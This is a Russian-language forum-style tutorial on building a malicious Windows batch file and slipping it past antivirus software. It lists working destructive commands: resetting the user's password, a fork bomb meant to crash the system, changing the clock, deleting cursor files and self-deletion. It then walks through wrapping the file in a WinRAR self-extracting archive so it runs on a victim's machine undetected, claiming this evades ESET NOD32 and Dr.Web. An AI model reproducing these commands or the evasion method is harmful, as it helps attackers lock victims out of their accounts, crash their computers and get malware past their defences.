Батники, и о том, как сделать чтобы они не ловились Антивирусными приложениями.
Эта статья о Батниках, и о том, как сделать чтобы они не ловились Антивирусными приложениями.
Всем Привет!
Свами CheatMaster
Может для некоторых эта статья не станет новостью, но всёравно я расскажу.
Для создания Батника нам необходимо Стандартный блокнот Windows (он есть у каждого) и архиватор WinRAR.
Итак начнём:
Создаём блокнот,пишем в него команды (они написанны ниже).
Затем Файл>Сохранить как...>
И в поле "Имя файла:" вместо "Текстовый документ.txt" пишем "Вирус.bat" и нажимаем "Сохранить"
_____________________________
Команды:
Меняет пароль текущего пользователя на 123456:
net user %username% 123456
Открывает больше 200 окошек,и если все не закрыть то комп грузнется и может слететь ОС(если слабый комп):
:s
start %0
%0|%0
goto :s|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0
goto :s
Ставит время на 0:00:
time 0:00 >nul
Удаление курсора:
del "%SystemRoot%Cursors*.*" >nul
Самоликвидация (самое главное):
del "%0" >nul
_____________________________
И казалось бы Батник готов, но возникает один вопрос:
Как заставить жертву запустить этот вирус? Т.к расшерение вируса "*.bat" жертва даже необратит на него внимание.
Здесь можно действовать двумя способами:
Способ 1
Скомпилировать файл спомощью программ таких как "MicroJoiner".
Но файл, полученный врезультате этого будет ловиться Антивирусами.
Способ 2
И наконец самое интересное, собственно длячего была написанна эта статья:
1) Создать с помощью Архива WinRAR - самораспаковывающийся архив.
2) Поместить в него готовый Батник.
3) Сменить расшерение файла ("*.rar.exe" на "*.rar") (где * - имя файла).
4) Затем открыть архив, и во вкладке "SFX" нажать "Дополнительные параметры SFX..."
5) Написать в поле "Выполнить после распаковки" имя вашего вируса (уже добавленного в архив) вместе с расширением, и нажать "OK". (В других вкладках можно написать Лацензионноесоглашение и т.д.)
6) Закрыть архив, и сменить расшерение ("*.rar" на "*.exe").
Если вы сделали всё верно, тогда ваш Вирус небудет ловиться Антивирусным приложением (Проверенно на ESET NOD32 и Dr.Web)